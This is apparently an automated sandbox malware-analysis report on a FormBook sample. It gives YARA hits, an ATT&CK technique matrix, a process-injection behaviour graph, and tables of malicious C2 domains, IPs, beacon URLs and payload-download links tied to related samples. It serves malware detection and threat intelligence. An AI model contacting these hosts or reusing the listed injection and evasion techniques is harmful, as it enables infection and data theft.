Source: Yara match | File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scheduled Task/Job1 | Scheduled Task/Job1 | Process Injection512 | Masquerading1 | OS Credential Dumping | Security Software Discovery231 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Scheduled Task/Job1 | Virtualization/Sandbox Evasion4 | LSASS Memory | Virtualization/Sandbox Evasion4 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Information Discovery112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue

          Behavior Graph

Legend (graph icons): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Behavior Graph ID: 339323
Sample: J0OmHIagw8.exe
Startdate: 13/01/2021
Architecture: WINDOWS
Score: 100

Start
  Signatures: Tries to download HTTP data from a sinkholed server; Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; 12 other signatures
  J0OmHIagw8.exe (started)
    DNS/IP: 192.168.2.1 unknown unknown
    Dropped: C:\Users\user\AppData\...\JcEEHoQdnETCO.exe (PE32); C:\Users\user\AppData\Local\...\tmpF65F.tmp (XML); C:\Users\user\AppData\...\J0OmHIagw8.exe.log (ASCII)
    vbc.exe (started)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      explorer.exe (injected)
        DNS/IP: www.exit-divorce.com 192.155.166.181, 49761, 80 PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL United States; queensboutique1000.com 142.44.212.169, 49756, 49772, 80 OVHFR Canada; 20 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        control.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          cmd.exe (started)
            conhost.exe (started)
    vbc.exe (started)
      Signatures: Tries to detect virtualization through RDTSC time measurements
    schtasks.exe (started)
      conhost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
J0OmHIagw8.exe | 31% | Virustotal |
J0OmHIagw8.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe | 100% | Joe Sandbox ML |

Unpacked PE Files

Source | Detection | Scanner | Label
5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.stnanguo.com/csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT | 100% | Avira URL Cloud | phishing
http://www.alparmuhendislik.com/csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.exit-divorce.com/csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://www.queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT | 100% | Avira URL Cloud | malware
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.travelnetafrica.com/csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://www.splendidhotelspa.com/csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://www.studentdividers.com/csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://logo.verisign | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://www.soundon.events/csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
splendidhotelspa.com | 205.134.254.189 | true | true | | unknown
queensboutique1000.com | 142.44.212.169 | true | true | | unknown
studentdividers.com | 34.102.136.180 | true | true | | unknown
www.travelnetafrica.com | 173.234.175.134 | true | true | | unknown
www.fessusesefsee.com | 45.77.226.209 | true | true | | unknown
epicmassiveconcepts.com | 34.102.136.180 | true | true | | unknown
www.exit-divorce.com | 192.155.166.181 | true | true | | unknown
www.alparmuhendislik.com | 23.105.124.225 | true | true | | unknown
www.stnanguo.com | 146.148.193.212 | true | true | | unknown
ext-cust.squarespace.com | 198.49.23.144 | true | false | | high
logansshop.net | 192.0.78.208 | true | true | | unknown
www.herbmedia.net | unknown | unknown | true | | unknown
www.queensboutique1000.com | unknown | unknown | true | | unknown
www.procreditexpert.com | unknown | unknown | true | | unknown
www.studentdividers.com | unknown | unknown | true | | unknown
www.logansshop.net | unknown | unknown | true | | unknown
www.splendidhotelspa.com | unknown | unknown | true | | unknown
www.thesouthbeachlife.com | unknown | unknown | true | | unknown
www.soundon.events | unknown | unknown | true | | unknown
www.latin-hotspot.com | unknown | unknown | true | | unknown
www.epicmassiveconcepts.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.stnanguo.com/csv8/?t8o8sPp=jG588BPFN24GA+JnJbzwJpIoc208xnuoJDpFE+MGYeEjWt0JePkAwfwipDNVrrzBFNJV&jBZd=KnhT | true | Avira URL Cloud: safe | unknown
http://www.fessusesefsee.com/csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT | true | Avira URL Cloud: phishing | unknown
http://www.alparmuhendislik.com/csv8/?t8o8sPp=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&jBZd=KnhT | true | Avira URL Cloud: safe | unknown
http://www.exit-divorce.com/csv8/?t8o8sPp=/WWabBMDJNFcoLaqfnEbo6hmuOxaPIPf4Swj3PCSZ12YB4sttwIxqUCSSH4NA1N37R36&jBZd=KnhT | true | Avira URL Cloud: safe | unknown
http://www.queensboutique1000.com/csv8/?t8o8sPp=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvOR5OTN0YiqA&jBZd=KnhT | true | Avira URL Cloud: safe | unknown
http://www.logansshop.net/csv8/?t8o8sPp=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2IqvscIWEsaZ&jBZd=KnhT | true | Avira URL Cloud: malware | unknown
http://www.travelnetafrica.com/csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT | true | Avira URL Cloud: safe | unknown
http://www.splendidhotelspa.com/csv8/?t8o8sPp=UyqXkzQbKyztPGX66qxwvXap1LDI1TOmYI1OusxlxwN3fVBnLta3wXT2zIL/xRkQBU5V&jBZd=KnhT | true | Avira URL Cloud: safe | unknown
http://www.studentdividers.com/csv8/?t8o8sPp=qn4X4+yxbbSsDYaEiiQ2PWd8LlsUN5GHqTXva27qpzu+WFndrUbREk96g9Cvik6UddJD&jBZd=KnhT | true | Avira URL Cloud: safe | unknown
http://www.epicmassiveconcepts.com/csv8/?t8o8sPp=iJ9LMG7MliwQjz4N9h8Hq4mQMyMQ8EbCXmiUEypb7zSuax6avA4zdFyQt2cMJ86uh/oE&jBZd=KnhT | true | Avira URL Cloud: safe | unknown
http://www.soundon.events/csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://logo.verisign | explorer.exe, 00000006.00000000.264819810.000000000F440000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | J0OmHIagw8.exe, 00000000.00000002.238745092.0000000003261000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | explorer.exe, 00000006.00000000.260756926.0000000008B46000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

(Map legend, image not included; marker size by share of contacted IPs: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs)

Public

IP              | Domain  | Country       | ASN    | ASN Name                                  | Malicious
192.0.78.208    | unknown | United States | 2635   | AUTOMATTICUS                              | true
45.77.226.209   | unknown | United States | 20473  | AS-CHOOPAUS                               | true
142.44.212.169  | unknown | Canada        | 16276  | OVHFR                                     | true
146.148.193.212 | unknown | United States | 26658  | HENGTONG-IDC-LLCUS                        | true
192.155.166.181 | unknown | United States | 132721 | PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL | true
23.105.124.225  | unknown | United States | 7203   | LEASEWEB-USA-SFO-12US                     | true
198.49.23.144   | unknown | United States | 53831  | SQUARESPACEUS                             | false
173.234.175.134 | unknown | United States | 395954 | LEASEWEB-USA-LAX-11US                     | true
34.102.136.180  | unknown | United States | 15169  | GOOGLEUS                                  | true
205.134.254.189 | unknown | United States | 22611  | IMH-WESTUS                                | true

Private

IP: 192.168.2.1

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 339323
Start date: 13.01.2021
Start time: 21:02:37
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: J0OmHIagw8.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/3@20/11
EGA Information: Failed
HDC Information:
• Successful, ratio: 36.5% (good quality ratio 33.5%)
• Quality average: 71.7%
• Quality standard deviation: 31.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 13.64.90.137, 168.61.161.212, 23.210.248.85, 51.104.144.132, 92.122.213.194, 92.122.213.247, 67.26.81.254, 8.248.137.254, 67.27.158.126, 8.248.139.254, 8.248.133.254, 51.103.5.186, 52.155.217.156, 20.54.26.129, 205.201.132.26, 51.104.139.180, 204.79.197.200, 13.107.21.200
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, terminator.capstone.com.akadns.net
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time     | Type            | Description
21:03:37 | API Interceptor | 1x Sleep call for process: J0OmHIagw8.exe modified

Joe Sandbox View / Context

IPs

Associated Sample Name / URL | Detection | Context (grouped by matching IP)

Match 192.0.78.208:
  hO3eV0L7FB.exe | malicious | www.logansshop.net/csv8/?lh28=O0GliFfpjJXxzb&LXe09=ZwKj9ShwklggAmvMfF0it6gA0E2+kz8+Lfh+752BzZBDlYhxiYZDgoXg2LG/wtUtDZzIGy8aoQ==

Match 45.77.226.209:
  YT0nfh456s.exe | malicious | www.fessusesefsee.com/csv8/?jFNHHj=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+YYNjj8xHGE1&Ppd=_6g8yvxH-6HLN
  Purchase_Order_39563854854.xlsx | malicious | www.fessusesefsee.com/csv8/?AZ=+aP4wUbIbQNs+TbszdcGOO7le47nUjGI8OlnJqcnh3cPKzklTXpy3Tz49+ULoSo6SgwCOg==&1bqtf=oL30w6o
  4520182243_224333.jpg.js | malicious | booomaahuuoooapl.ru/t.php?on=1
  4520182243_224333.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  6120184456_445675.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  6120184456_445675.jpg.js | malicious | booomaahuuoooapl.ru/t.php?on=1
  5020189792_979255.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  5020189792_979255.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1020182773_277307.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1020182773_277307.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  020187178_717832.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1220180178_017855.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1220180178_017855.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1420183796_379604.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1420183796_379604.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1020189484_948400.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  5720181654_165464.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  420185187_518739.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1020186011_601176.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe
  1420185506_550645.jpg.js | malicious | booomaahuuoooapl.ru/oo.exe

Match 142.44.212.169:
  pHUWiFd56t.exe | malicious | www.queensboutique1000.com/csv8/?LJB=GbtlyLR0j&Rxl=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvNxpBydMGHDH
  Z7G2lyR0tT.exe | malicious | www.queensboutique1000.com/csv8/?t8r8=8DCWdlpVqJDMTE6O1pDiewAZ51bcDeHXIhtTkyu/PoYXbpdVgZUBuvBpvORTRj90cgiA&9r1Tl=D4n4

Domains

Associated Sample Name / URL | Detection | Context (grouped by matching domain)

Match www.travelnetafrica.com:
  Z7G2lyR0tT.exe | malicious | 173.234.175.134

Match www.exit-divorce.com:
  0XrD9TsGUr.exe | malicious | 192.155.166.181
  3Y690n1UsS.exe | malicious | 192.155.166.181
  Purchase_Order_39563854854.xlsx | malicious | 192.155.166.181

Match www.alparmuhendislik.com:
  JAAkR51fQY.exe | malicious | 23.105.124.225
  0XrD9TsGUr.exe | malicious | 23.105.124.225
  oJmp4QUPmP.exe | malicious | 23.105.124.225
  Order_009.xlsx | malicious | 23.105.124.225
  Z7G2lyR0tT.exe | malicious | 23.105.124.225

Match www.fessusesefsee.com:
  YT0nfh456s.exe | malicious | 45.77.226.209
  Purchase_Order_39563854854.xlsx | malicious | 45.77.226.209

Match www.stnanguo.com:
  googlechrome_3843.exe | malicious | 146.148.193.212
  U0N4EBAJKJ.exe | malicious | 146.148.193.212
  Z7G2lyR0tT.exe | malicious | 146.148.193.212

Match ext-cust.squarespace.com:
  pHUWiFd56t.exe | malicious | 198.49.23.145
  Order_009.xlsx | malicious | 198.185.159.141
  List items.exe | malicious | 198.49.23.141
  PO8433L.exe | malicious | 198.185.159.141
  vOKMFxiCYt.exe | malicious | 198.49.23.141
  Payment Advice - Advice Ref GLV823990339.exe | malicious | 198.49.23.141
  NEW PO.exe | malicious | 198.185.159.141
  Quotation.exe | malicious | 198.185.159.145
  PO#646756575646.exe | malicious | 198.49.23.145
  PO#646756575646.exe | malicious | 198.185.159.145
  PO8479349743085.exe | malicious | 198.185.159.144
  PO8479349743085.exe | malicious | 198.185.159.145
  PO8479349743085.exe | malicious | 198.49.23.144
  vSCyL8NNIC.exe | malicious | 198.185.159.145
  plusnew.exe | malicious | 198.49.23.144
  Shipping Documents.exe | malicious | 198.185.159.145
  invoice.exe | malicious | 198.185.159.144
  http://39unitedfrkesokoriorimiwsdystreetsmghg.duckdns.org/chnsfrnd1/vbc.exe | malicious | 198.185.159.145
  sample.exe | malicious | 198.49.23.145
  bXdiOPDmyZ.exe | malicious | 198.185.159.144

ASN

Associated Sample Name / URL | Detection | Context (grouped by matching ASN)

Match AS-CHOOPAUS:
  DTwcHU5qyI.exe | malicious | 137.220.48.181
  4wCFJMHdEJ.exe | malicious | 45.32.95.179
  BSL 21 PYT.xlsx | malicious | 137.220.48.181
  20210111140930669.exe | malicious | 139.180.142.220
  H56P7iDwnJ.doc | malicious | 207.148.24.55
  Confirm!!!..exe | malicious | 107.191.37.252
  inv.exe | malicious | 141.164.40.157
  invoice.doc | malicious | 45.76.190.53
  Copy111.exe | malicious | 107.191.37.252
  rib.exe | malicious | 144.202.62.148
  56HTe9n3fI.exe | malicious | 45.76.137.184
  IMG30122020.exe | malicious | 198.13.52.21
  SecuriteInfo.com.Trojan.GenericKDZ.72142.10833.exe | malicious | 149.28.244.249
  SecuriteInfo.com.Trojan.GenericKDZ.72142.10833.exe | malicious | 149.28.244.249
  utox.exe | malicious | 45.32.38.24
  qsUJ9oNU6a.exe | malicious | 45.77.254.200
  SecuriteInfo.com.Trojan.Rasftuby.Gen.14.16943.exe | malicious | 45.77.254.200
  SecuriteInfo.com.Trojan.Rasftuby.Gen.14.10239.exe | malicious | 45.77.254.200
  SecuriteInfo.com.Trojan.Rasftuby.Gen.14.15706.exe | malicious | 45.77.254.200
  SecuriteInfo.com.Trojan.Rasftuby.Gen.14.1636.exe | malicious | 45.77.254.200

Match AUTOMATTICUS:
  3S1VPrT4IK.exe | malicious | 192.0.78.24
  pHUWiFd56t.exe | malicious | 192.0.78.138
  LOI.exe | malicious | 192.0.78.24
  Revise Order.exe | malicious | 192.0.78.24
  Order_385647584.xlsx | malicious | 192.0.78.138
  Consignment Details.exe | malicious | 192.0.78.134
  Shipping Documents PL&BL Draft.exe | malicious | 192.0.78.25
  SCAN_20210112140930669.exe | malicious | 192.0.78.24
  20210111140930669.exe | malicious | 192.0.78.24
  099898892.exe | malicious | 192.0.78.24
  QN08qH1zYv.exe | malicious | 192.0.78.25
  RF-E68-STD-2020-106.xlsx | malicious | 192.0.78.24
  PO21010699XYJ.exe | malicious | 192.0.78.24
  http://mckeepropainting.com/.adv3738diukjuctdyakbd/dhava93vdia11876dkb/ag38vdua3848dk/sajvd9484auad/ajd847vauadja/101kah474sbbadad/wose/Paint20200921_2219.pdf.html | malicious | 192.0.77.48
  catalogo TAWI group.exe | malicious | 192.0.78.25
  http://herculematerilesede.tumblr.com/ | malicious | 192.0.77.40
  http://free.atozmanuals.com | malicious | 192.0.73.2
  https://canningelectricinc.wordpress.com/ | malicious |
                                                                          • 192.0.79.33
                                                                          rib.exeGet hashmaliciousBrowse
                                                                          • 192.0.78.12
                                                                          http://getfreshnews.com/nuoazaojrnvenpyxyseGet hashmaliciousBrowse
                                                                          • 192.0.73.2
